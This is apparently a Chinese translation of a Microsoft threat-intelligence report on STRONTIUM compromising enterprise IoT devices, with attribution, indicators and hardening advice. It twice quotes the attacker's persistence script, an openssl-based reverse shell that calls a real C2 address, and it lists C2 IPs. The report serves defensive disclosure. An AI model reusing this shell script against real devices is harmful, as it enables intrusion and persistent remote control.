企业物联网 - 入侵的路径

多个来源估计，到2020年全球将部署约500亿台物联网设备。物联网设备被特意设计为连接到网络，许多设备只是简单地连接到互联网，缺乏管理和监督。这些设备仍然需要被安全团队识别、维护和监控，尤其是在大型复杂企业中。一些物联网设备甚至可能将基本遥测数据传回设备制造商，或者具有接收软件更新的方式。然而，在大多数情况下，客户的IT运营中心并不知道这些设备存在于网络中。

2016年，恶意软件研究小组MalwareMustDie发现了Mirai僵尸网络。该僵尸网络最初由IP摄像头和基本家用路由器组成，这两种物联网设备常见于家庭中。随着更多Mirai变种的出现，其目标物联网设备列表也在扩大。驱动该僵尸网络的恶意软件的源代码最终被泄露到网上。

2018年，数十万台家庭和小型企业网络及存储设备被入侵，并加载了所谓的“VPN Filter”恶意软件。FBI公开将此活动归因于一个国家行为体，并随后采取了行动来破坏该僵尸网络，但除非用户实施了适当的固件或安全控制措施，否则这些设备仍然容易再次感染。

在2018年平昌冬奥会开幕式期间，多家媒体报道了几起针对多个设备的网络攻击。几天后，官员们确认他们成为了恶意网络攻击的受害者，这些攻击阻止了与会者打印奥运会门票，主新闻中心的电视和互联网接入也停止了工作。

三台物联网设备

今年4月，微软威胁情报中心的安全研究人员发现了一个已知对手的基础设施与多台外部设备通信。进一步的研究发现，该行为体试图在多个客户位置入侵流行的物联网设备（一台VOIP电话、一台办公室打印机和一台视频解码器）。调查发现，一个行为体利用这些设备获得了对企业网络的初始访问权限。在其中两起案例中，设备的密码部署时未更改制造商的默认密码，而在第三起案例中，设备未应用最新的安全更新。

这些设备成为了入侵点，行为体由此在网络中建立存在并继续寻找进一步的访问权限。一旦行为体成功建立了对网络的访问权限，简单的网络扫描寻找其他不安全的设备使他们能够发现并在网络中移动，寻找更高权限的账户以获得对更高价值数据的访问权限。在获得对每台物联网设备的访问权限后，行为体运行tcpdump来嗅探本地子网上的网络流量。他们还被观察到枚举管理组以尝试进一步利用。随着行为体从一台设备移动到另一台设备，他们会丢弃一个简单的shell脚本来建立网络持久性，从而允许延长访问权限以继续狩猎。网络流量分析显示，这些设备还与外部命令和控制（C2）服务器通信。

1
2
3
4

--contents of[IOT Device]` file–
!/bin/sh
export _[IOT Device]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &
–end contents of file–``

图1：用于维护网络持久性的脚本

以下IP地址被认为是在这些入侵期间被行为体用于命令和控制（C2）的：

• 167.114.153.55
• 94.237.37.28
• 82.118.242.171
• 31.220.61.251
• 128.199.199.187

归因

我们将这些使用三台流行物联网设备攻击客户的行为归因于微软称为STRONTIUM的活动组。由于我们在早期阶段识别了这些攻击，我们无法最终确定STRONTIUM在这些入侵中的最终目标是什么。

在过去十二个月中，微软已向那些被STRONTIUM针对或入侵的人发送了近1400次国家行为体通知。五分之一的STRONTIUM活动通知与针对全球非政府组织、智库或政治附属组织的攻击有关。其余80%的STRONTIUM攻击主要针对以下行业的组织：政府、IT、军事、国防、医学、教育和工程。我们还观察到并通知了针对奥运会组委会、反兴奋剂机构和酒店业的STRONTIUM攻击。FBI还将“VPN Filter”恶意软件归因于STRONTIUM。

行动呼吁

今天我们分享这些信息是为了提高整个行业对这些风险的认识，并呼吁更好地将物联网设备集成到企业中，特别是在企业网络中监控物联网设备遥测数据的能力。如今，部署的物联网设备数量超过了个人电脑和移动电话的总和。由于每个联网的物联网设备都有自己独立的网络堆栈，很容易看出需要更好的企业管理，尤其是在当今的“自带设备”世界中。

虽然行业大多关注硬件植入的威胁，但在这个例子中我们可以看到，对手乐于利用更简单的配置和安全问题来实现他们的目标。这些利用薄弱设备管理的简单攻击可能会随着更多物联网设备部署在企业环境中而扩大。调查结束后，我们与所涉及特定设备的制造商分享了这些信息，他们利用这一事件探索了产品中的新保护措施。然而，需要更广泛地关注物联网整体，既需要组织的安全团队更加意识到这些类型的威胁，也需要物联网设备制造商提供更好的企业支持和监控能力，使安全团队更容易防御其网络。

入侵指标

以下是微软在本文讨论的STRONTIUM活动期间观察到的一系列活跃指标。

命令与控制（C2）IP地址

• 167.114.153.55
• 94.237.37.28
• 82.118.242.171
• 31.220.61.251
• 128.199.199.187

用于维护网络连接设备持久性的脚本

1
2
3
4

--contents of[IOT Device]` file–
!/bin/sh
export _[IOT Device]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &
–end contents of file–``

保护企业物联网的建议

组织可以采取额外措施保护其基础设施和网络免受类似活动的影响。微软建议采取以下行动来更好地保护和管理与物联网设备相关的风险：

• 要求批准并编录在企业环境中运行的任何物联网设备。
• 为每个物联网设备制定自定义安全策略。
• 避免将物联网设备直接暴露在互联网上，或创建自定义访问控制以限制暴露。
• 如果可行，为物联网设备使用单独的网络。
• 对部署的物联网设备进行例行配置/补丁审计。
• 定义隔离物联网设备、保存设备数据、维护设备流量日志以及捕获设备镜像进行取证调查的策略。
• 将物联网设备配置弱点或基于物联网的入侵场景作为红队测试的一部分。
• 监控物联网设备活动以检测异常行为（例如打印机浏览SharePoint站点…）。
• 审计任何有权访问物联网设备的身份和凭据、用户和进程。
• 如果可行，集中资产/配置/补丁管理。
• 如果设备由第三方部署/管理，请在合同中包含明确条款，详细说明要遵循的安全实践以及报告所有受管设备安全状态和健康状况的审计。
• 如果可能，在物联网设备供应商合同中定义SLA条款，为涉及其产品的任何入侵设置相互可接受的调查响应和取证分析窗口。

这个案例是Eric Doerr将于2019年8月8日在Black Hat上展示的几个例子之一，微软呼吁提高行业透明度，确保防御者最好地装备以应对来自资源充足对手的威胁。

微软威胁情报中心（MSTIC）